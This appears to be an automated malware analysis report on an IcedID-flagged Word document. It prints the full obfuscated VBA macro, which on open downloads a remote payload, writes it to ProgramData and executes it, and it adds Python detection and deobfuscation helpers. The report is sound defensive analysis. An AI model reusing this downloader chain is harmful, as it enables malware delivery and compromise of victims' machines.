Verdict: MALICIOUS
Risk score: 230
Heuristics: 6
- ClamAV: Doc.Macro.ICEID1020-9781212-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML [medium] OOXML_VBA (3 related findings): document contains a VBA project; VBA macros present.
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `Set rGUXi = CreateObject("Script" + hjUlx)`
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the finding's detail line.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: `Sub AutoOpen()`
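The pairing rule behind OLE_VBA_PCODE_AUTOEXEC_EXEC, reimplemented in Python as an added illustration (this is not the analyzer's own code). It takes the decoded text of a VBA module or p-code stream, or the raw bytes, which are scanned both as Latin-1 and as UTF-16LE because Office stores some strings in either form, and fires only when an auto-exec entry point and an execution token co-occur. The sample stream is constructed from lines of macros.bas shown on this page; the token lists are the ones named in the finding.

```python
# Paired-token heuristic: auto-exec entry point AND execution token in one stream.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def _views(stream):
    """Text views to scan. A str is scanned as-is; bytes are scanned as Latin-1
    (ASCII/ANSI strings in decompressed source and p-code) and as UTF-16LE
    (wide strings), so a token stored in either encoding is seen."""
    if isinstance(stream, str):
        return [stream.lower()]
    return [stream.decode("latin-1").lower(),
            stream.decode("utf-16-le", errors="ignore").lower()]


def _present(tokens, views):
    # Plain substring matching on purpose: p-code and string tables are not
    # tokenised identifiers, and split literals such as "Script" + "ing..."
    # mean a token may sit inside a larger string.
    return [t for t in tokens if any(t.lower() in v for v in views)]


def pcode_autoexec_exec(stream):
    """Return the heuristic verdict plus the tokens that drove it.
    'fires' is True only when BOTH lists are non-empty."""
    views = _views(stream)
    autoexec = _present(AUTOEXEC_TOKENS, views)
    execs = _present(EXEC_TOKENS, views)
    return {"fires": bool(autoexec) and bool(execs),
            "autoexec": autoexec, "exec": execs}


# Constructed excerpt: lines taken from the macros.bas preview on this page.
SAMPLE_STREAM = """Sub AutoOpen()
Dim UfEXS As New agYHw
QWQBC = UfEXS.usTTN("MSXML2.serverXMLHTTP")
UMSdl fRpuN(QWQBC)
End Sub
Set rGUXi = CreateObject("Script" + hjUlx)
"""

if __name__ == "__main__":
    print(pcode_autoexec_exec(SAMPLE_STREAM))
```

Either token alone (an AutoOpen that only shows a message box, or a Shell call in a routine nothing triggers) returns `fires: False`, which is what keeps the rule quiet on ordinary macro-enabled templates.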
- Embedded URL [info] EMBEDDED_URL: one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label gives the channel (macro, JS, link annotation, document body, ...) that reached it. Every URL below was found in document text (OOXML body / shared strings). All of them are XML namespace URIs from the OOXML markup (WordprocessingML, DrawingML, markup compatibility), so they are expected in any modern .docx and are not network indicators; the macro's actual download URL is not among them (see the Detection notes).
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12472 bytes | 55146e83de5d17bd7d178b1422e15a8be51e1307c6e85b91a91944d5f2c05b95 |

Preview of macros.bas (first 1,000 lines of the extracted script; the whole module set fits within that limit):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "pkXkO"
Sub UMSdl(QWQBC, Optional ByVal BfQKa As String = "c:\programdata\qteNy.txt", Optional ByVal hjUlx As String = "ing.FileSystemObject")
' Wallchart selfdestruct jawbones
' Encumbrances satanically telescoping
' Contests forbore pottered frumpy
' Supremacist whirred villas adapts prolix
' Waywardly knot
' Kindred
' Businessmen limitation merging bladed empathise favoured
' Foliated collectively
' Sensation backpacking pointedness bundling discords abbot injunction
' Indexer
' Soot footstool constriction devouring snouts
' Emphasising tobacconists centralist
' Belittle killjoys heresy chronologically
' Criminalised blesbok
' Arabesque wallets homologues photons
' Alabaster onagers actuaries reaffirm
' Modifiers overthrow
' Gloated idolise touch move tracery
' Troughs slacks
' Sojourn meringues fashioned crofting waist
Set rGUXi = CreateObject("Script" + hjUlx)
' Commandant punning permeated
' Progressiveness loudspeaker havana papacy
' Lateral zombi
' Floras
' Facilitation redoubled marshiest captions
' Ungenerous coextensive gainly joys
' Wended pinkies
Set gOtsG = rGUXi.CreateTextFile(BfQKa)
' Witchdoctors enzyme inexpensive syllable
' Hamburg sharpener coffee witchlike
' Attractors wisps coronation welt premiss marshaller agitatedly
' Complementary cams
' Apoplectic allured foolishness drawling busker ideology
' Tightness strangled idealist
gOtsG.WriteLine QWQBC
' Underpass splices craftsmen
' Upholding inflating
' Boozer
' Recollected waterproofing resuscitation undergrowth
' Fibres interjects luminescent institution peacock
' Derails tapped evasions pulping
gOtsG.Close
' Grizzled wickerwork
' Arthropods consciencestricken reactivating
' Skulk obnoxious implicates warbles replenish
' Try
' Vending
' Developed transcendental
' Arbitrates incapable bassoon
' Twin
' Family repository
' Hearkening implemented raillery vilification threshed
' Sibilant positrons
' Racket summarily
' Breakthrough gratifications chattel authenticity housebound
' Prophesied crucifix curlicues
' Vesting cooled
' Employ bedstead paraplegic
' Clotted
' Stagnant spastics snob cannes westerners plushy
' Bullfighting debilitate misjudge indiscipline mused
' Jackdaws desiccator deciding bedsores unmistakably floreat windfall
' Embrasure foghorn fluxes
' Recollects charter radiate situations
' Lynchpin lasing
' Feds
' Plateaux limbo weaselly feedstock ulcerations
' Producer semblances role
' Prosaically disappoint irascibly
' Linking acreage reanimated
' Omnibus breeder outdoor
' Vats inadvisability
' Reoccur cameramen ravages elbowed
' Mess decapitated
' Pernicious distrustful circumnavigates
' Brown
' Bossing embraced
' Canvas gyrations
' Pragmatists diabetics
' Mortise misfiled
' Premature mourned laps
End Sub
' Armlets mirrored
' Iraqi ascertain
' Disobeying recursively quaff
' Expandable nicknames orthonormal sputniks
' Defectors nunnery separates microscopist odds
Sub AutoOpen()
' Minutely unmeasurable liberal buyer brainy
' Meadow nightdresses annotation
' Effectively thrush
' Ripened gravedigger nobleman wantonness
' Clump beta nameplates spaded unsettling districts
' Eritrea entreated
' Mildmannered quaintly
' Armourers harpists
' Languorous duels sippers unseasonal coverlet
' Drinkers registries spinster
' Bathurst
' Toss allusion addles sanctifies
' Exhausts agonisingly
' Overlook hollowly preciousness compromises
' Pizzicato skyscape
' Murderous sincerely climate import
' Publication nicest impiety
' Lively theoretically pivots
' Prostrate splitters hangman becks reclassifying pele
' Egged skyscraper elevators restore
' Rasps inanely
' Endurable
Dim UfEXS As New agYHw
' Deride brown oscillated airwaves hydrolysis solitary
' Powerhouses oxidising cleared pettiest jellies megawatt
' Scrolled valhalla allegiances pollution revamps forester whelp
' Pervasiveness covariances slighter
' Complicity waited ears fathomless tremendous theorists
QWQBC = UfEXS.usTTN("MSXML2.serverXMLHTTP")
' Gasping allowing vignettes obloquy undercarriage disquietude
' Toys blotch persuasions bookers
' Torsions hovel intervals lemons
' Tendering liquorish enforcer
' Travellers spreadsheets vizier chaperon
' Solve gastrointestinal inched
UMSdl fRpuN(QWQBC)
' Zaps farflung thundered rarefaction
' Summoning scaffolds additions bloods heaters
' Fabricated trial
' Normalisers magnetodynamics patriotic appeases
' Infinite corroborating
' Damson exalt crashlanding likings disbeliever
' Funnelled firsts accusation
' Beatification amateurishly eluded tolls unaffordable
' Centrifuge relativist goalscorers
' Vividness readjusted immobilised
' Disposed nosiest ambulant oval nanosecond supermen
' Digitiser jarring infringes
wcXTS zASTd(0) + "vr32 c:\programdata\qteNy.txt", "ws"
End Sub
Function MGcKG(SXTtQ, lMImn)
' Essayists people scar depress
' Samplings pebbly thoughtprovoking intifada redefined
' Inhomogeneities reddish lithosphere borrowed platforms
' Alkaloid basins
MGcKG = Split(SXTtQ, lMImn)
End Function
Attribute VB_Name = "cILzf"
' Pizza weeks
' Speakers footgear
' Structure neaten luxuriance
' Feels steamier
' Associative clears potters
Function fRpuN(aoIYb)
' Crotchet wont digestive geomagnetic skimming
' Geographic orating
' Overfeed hardly
' Pilfered unmasked cloaca petrochemicals
' Disputing unforgiven
' Newspaper
' Outraging deft buoyancy
fRpuN = StrConv(aoIYb, vbUnicode)
' Determinant reckoned rookery underachievement
' Revolutionising venison amphitheatre
' Binomial undercover vibrators
' Implicit superstructure licences undergone teaser
' Deliverer happily triple revived
' Meriting malformations smear worshipful
End Function
' Hearth isle magnetised superconductor fleecing
' Dads gloated parentinlaw conquest
' Durability
' Allocation scarifying
' Indicted
Function oNXZc()
' Radiate lantern mnemonics
' Legibility slumps deliverable
' Hungers
' Harvest demystification marshmallow mourners sending brigadier
' Gems
' Interposition supercomputing quinine measureless
' Curving lighting escapade trachea partakes nocturne
' Torrents
' Impersonality deconstruct academia
With ActiveDocument.shapes(1)
oNXZc = .AlternativeText
End With
End Function
' Undetermined unconscionable grace gadgets swabs
' Omnidirectional trapeze aggression
' Sanctioning quoits lower
' Skippers depressing mellow gathering muster
' Combined fork grout gracefulness deliverance
' Objecting rematch downpour
' Handed messier paltrier
Function zASTd(qUlNk)
' Sweethearts rigidifies
' Tamers humouring
' Quantum colloquialism haha reptilian behemoth
' Spaying
' Trick town porcelain capsize anticyclone antibiotics designations talk
' Slimmest disruptor
' Biblically
' Eviscerate girding
' Infusing scruple
' Comedown
' Attachment likeminded twisting bloc hut
' Exorbitantly undress blundered
MSjRu = oNXZc()
YKSVa = MGcKG(MSjRu, "###")
PhAuG = YKSVa(qUlNk)
zASTd = PhAuG
End Function
Attribute VB_Name = "agYHw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Dallied gamesmen
' Flock overdetermined geocentric fitment unseeing
' Systemically
' Liquids stiffen
' Accusers align screechy thoughtless badgered topicality
' Overstress followings
' Ripstop religious constructional unethically formulates
Function usTTN(GLwmJ)
' Flicks grinds
' Biophysical sluices trencher tenacious slugged
' Horrifically
' Absurd million
' Rattle retraces
Dim BDOfU As Object
' Exemplars forested yews poorest dresses convoluted
' Digest propitiation concurrence destitute demarcation
' Digress judaism grouch vigils
' Ash bustled northwards marched broadcasters shibboleth fixtures
' Moveable twitchy depositing cramming forefathers droller
' Flickery rhino billowing stereographic
' Corresponding
' Crinkled sultans
' Jellify discontentedly preens
' Reminisces duck bedsheets
' Unselfishly speciation heaveho interlocks
' Infertility wold hardship
' Talismans wedging seamail
Set BDOfU = CreateObject(GLwmJ)
' Recounting contemporaneity deceive vaccine
' Elector lichened invisibilities warns
' Unclassifiable wheel
' Pushing insufferable
' Definite animists artworks
' Stain bloodsuckers borders
' Ratlike sprite battlefield
' Splashed
' Unconvincingly sewerage
' Stellar outrage receivable sunspot telecoms
' Floorboard implementing alarm rudimentary stratifies barley
' Gladness unmounted gazette gesticulations
' Standardisations
' Sixty patients
' Tremor stylist forget holidaymaker overvalued cent
' Acoustically fission encapsulates
' Dainty leers
' Perseveres biding tweedy ureters
' Gaming gland touche filler
' Hitchhiking rectifies corrects beatitudes kilobits
' Tinkle jester restrains hubbies financing
' Maoist
' Variation conjurer actuation counterpointed photographically
rczwE = zASTd(1)
' Muddier terrorism
' Weird accrediting enigmatically kampong
' Workings concatenating priestesses supercomputing
' Worktops polyunsaturated
BDOfU.Open "GET", Reverse(rczwE), False
' Fly blackguard
' Nibblers stub parentheses
' Horde
' Unintuitive bangs paragliding
' Stricken heaths amendment
' Nugget dazzler standardisation anacondas
BDOfU.Send
' Paean
' Document directives
' Trailing spayed glossaries mayoralty
' Dissenting convent
' Undeclared instructor unsettle
usTTN = BDOfU.responsebody
End Function
Attribute VB_Name = "UpQZP"
Sub wcXTS(KbCdK, ZJBHp)
' Aquatic duomo sociologists
' Batches hushes massing
' Indigestible anal paused
' Pennant greets scouting
' Fin upholstered
' Custard remixes engorged auroral
' Regales sonora paragraphing respectability rocked
' Chews tendentious
Set mgkch = CreateObject(ZJBHp + "cript.shell")
' Redshift
' Clerical sedatives sided holistic
' Linearity sustenance tartans thespians
' Lore overrated
' Quotes mutts jackdaws craters renter radiantly vilify lack
' Magical knack blubbering sensible
' Exclusively computable incinerated conductance snippet urine
' Peanuts coercion
' Bob disaffiliated boozers termini rainbow
' Intertwine elliptic
' Chromatograph befall impious redecoration inscribed
' Forte err pedestrianised
' Scriptural shopkeeper aloud
' Mingle bellows baritones paints
' Killjoys unapologetic rummy disobedient
' Secretary invigilators
' Pots sunscreens industrialist
' Ridden uphold stringer
' Auroral backfired haddocks prioritises spanning reserve
' Redistributions overreaction vitiate topper outgo
' Dimorphic
' Chinless communicativeness
' Touchandgo pipeline smallholdings
' Shocking reviewable boasted
' Garters delineating consorted untutored sushis
' Backwaters retrievals
' Trainers everlasting promotable
' Pleasantries pounded pulsates
' Advocacy
' Costars graham
' Furs intrigues leghorn graced iconography maltreat
' Hallows teepee misspells
' Sheathing sparks rearrangement cubistic immanently drunk
' Ledges vassalage
' Coincides repudiation
' Whereabouts interviews mutinous distracts illfated
' Antigen reshuffled menstrual hotter lipid
' Pullover voidable conker bookstall
' Irretrievable modulate bazaar
' Spraining preschool burdock chutzpah freezer potentiality
' Croquet designated
' Frying individualist affairs
' Objectionable physiotherapists annuls blackbirds
' Yeas slacker
' Glasses
' Interbreeding loanable mystified
' Unpoetical grassed respond spectroscopes shammed
' Recognisers foam
' Demonstrably medleys
' Admonitions crumbling crusades freeing
' Terrorised
' Toenails sanctified fixer anticipated
mgkch.exec KbCdK
' Excellence devilishly cytology
' Oblongs whereon fang
' Allowance
' Lux
End Sub
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 45568 bytes | 36b96e129aa4f402b848b9930f473aab96a91584a19f8d9dbbb30be1b1be02ba |
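The macro never spells out its URL or its command line: usTTN reads ActiveDocument.Shapes(1).AlternativeText, MGcKG splits it on "###", agYHw.Reverse un-reverses element 1 into the GET target, and wcXTS glues element 0 onto "vr32 c:\programdata\qteNy.txt". The following is an added Python emulation of that string handling so the indicators can be recovered statically (it is not part of the report or of the sample). It reads the first shape's alternative text from a constructed word/document.xml fragment, taking the descr attribute of wp:docPr, which is where Word keeps a shape's alternative text; the real document's shape text is not in this report, so "PREFIX" and http://example.invalid/payload are placeholders standing in for the values the sample would carry.

```python
import xml.etree.ElementTree as ET

# Namespaces as declared in the OOXML markup (both appear in this report's URL list).
WP_NS = "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Constructed stand-in for word/document.xml. The real alt text is not in the
# report: "PREFIX" is a placeholder for the command prefix (zASTd(0)) and the
# reversed string is http://example.invalid/payload written backwards (zASTd(1)).
DOCUMENT_XML = (
    f'<w:document xmlns:w="{W_NS}" xmlns:wp="{WP_NS}">'
    '<w:body><w:p><w:r><w:drawing><wp:inline>'
    '<wp:docPr id="1" name="Picture 1" '
    'descr="PREFIX###daolyap/dilavni.elpmaxe//:ptth"/>'
    '</wp:inline></w:drawing></w:r></w:p></w:body></w:document>'
)

DROP_PATH = r"c:\programdata\qteNy.txt"   # UMSdl's default for BfQKa


def shape_alt_text(document_xml, index=1):
    """ActiveDocument.Shapes(index).AlternativeText: the descr attribute of the
    index-th wp:docPr in word/document.xml (1-based, like the VBA collection)."""
    root = ET.fromstring(document_xml)
    doc_prs = list(root.iter(f"{{{WP_NS}}}docPr"))
    return doc_prs[index - 1].get("descr", "")


def vba_reverse(text):
    """agYHw.Reverse: Trim, then reverse the character order.
    (VBA Trim strips spaces only; str.strip also removes tabs/newlines.)"""
    return text.strip()[::-1]


def emulate_macro(document_xml):
    """Replay the macro's string assembly without executing anything."""
    alt = shape_alt_text(document_xml)                 # oNXZc()
    parts = alt.split("###")                           # MGcKG(MSjRu, "###")
    exe_prefix, reversed_url = parts[0], parts[1]      # zASTd(0), zASTd(1)
    return {
        # Split ProgIDs, reassembled exactly as the source concatenates them.
        "com_objects": ["Script" + "ing.FileSystemObject",   # UMSdl
                        "MSXML2.serverXMLHTTP",              # usTTN argument
                        "ws" + "cript.shell"],               # wcXTS
        "url": vba_reverse(reversed_url),    # BDOfU.Open "GET", Reverse(rczwE)
        "drop_path": DROP_PATH,              # CreateTextFile / WriteLine target
        "command": exe_prefix + "vr32 " + DROP_PATH,   # mgkch.exec KbCdK
    }


if __name__ == "__main__":
    for key, value in emulate_macro(DOCUMENT_XML).items():
        print(f"{key}: {value}")
```

Run against the real word/document.xml pulled from the .docx zip, the same function yields the actual download URL and the full command line, which is the fastest way to confirm what "vr32" completes to before any dynamic analysis.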
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely (analyzer field). This verdict is contradicted by the extracted source in macros.bas, which pads every routine with junk comment lines, splits COM ProgIDs across literals ("Script" + "ing.FileSystemObject", "ws" + "cript.shell"), stores the download URL reversed, and keeps both the URL and the first part of the command line outside the VBA project, in the alternative text of the document's first shape (ActiveDocument.shapes(1).AlternativeText, split on "###").
Behaviour as read from the source: AutoOpen instantiates the class module agYHw, whose usTTN creates MSXML2.serverXMLHTTP, issues a synchronous GET to the un-reversed URL and returns responsebody; fRpuN converts the body with StrConv(..., vbUnicode); UMSdl writes it to c:\programdata\qteNy.txt through Scripting.FileSystemObject; wcXTS then runs <alt-text element 0> + "vr32 c:\programdata\qteNy.txt" via WScript.Shell.exec. The remote URL and the name that "vr32" completes are not recoverable from this report; they require the shape text from word/document.xml.